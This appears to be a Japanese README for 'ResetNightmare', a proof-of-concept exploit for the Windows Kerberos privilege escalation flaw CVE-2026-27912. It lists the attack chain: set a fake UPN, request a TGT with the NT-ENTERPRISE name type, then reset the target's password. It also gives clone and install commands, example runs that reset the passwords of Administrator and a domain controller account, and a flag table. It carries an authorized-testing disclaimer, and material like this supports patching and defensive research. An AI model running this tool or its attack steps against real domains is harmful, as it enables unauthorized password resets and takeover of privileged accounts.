
CVE-2026-27912 - Windows Kerberos 特権昇格の脆弱性
ResetNightmare - Kerberos パスワード変更プロトコルの欠陥による不正なパスワードリセット
| 項目 | 値 |
|---|---|
| CVE | CVE-2026-27912 |
| タイトル | Windows Kerberos 特権昇格の脆弱性 |
| CVSS | 8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| CWE | CWE-285: 不適切な認可 |
| 公開日 | 2026年4月14日 |
| パッチ適用日 | 2026年4月 |
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success
Install-WindowsFeature RSAT-AD-PowerShell)# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912
# Install dependencies
pip install -r requirements.txt
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v
| フラグ | 説明 | デフォルト |
|---|---|---|
-t / --target | 対象アカウント名 | 必須 |
-p / --new-password | 対象アカウントの新しいパスワード | 必須 |
-u / --upn-user | 偽のUPNを設定するアカウント | 必須 |
-up / --upn-password | UPNアカウントのパスワード | 必須 |
-c / --computer | UPNUserがコンピューターアカウントである場合 | フラグ |
-r / --rubeus-path | Rubeus.exeへのパス | Rubeus.exe |
-e / --encryption | 対応する暗号化の種類 | AES256 |
-path / --create-path | 新しいアカウントを作成するOUパス | "" |
-d / --dc | ドメインコントローラー名 | 自動検出 |
-v / --verbose | 詳細な出力 | フラグ |
認可されたセキュリティテストおよび教育研究目的に限ります。
コンピューターシステムへの不正アクセスは違法です。作者は本ソフトウェアの誤用について一切責任を負いません。
n0vax1337 / セキュリティリサーチャー
MIT License - LICENSE を参照
最終更新日: 2026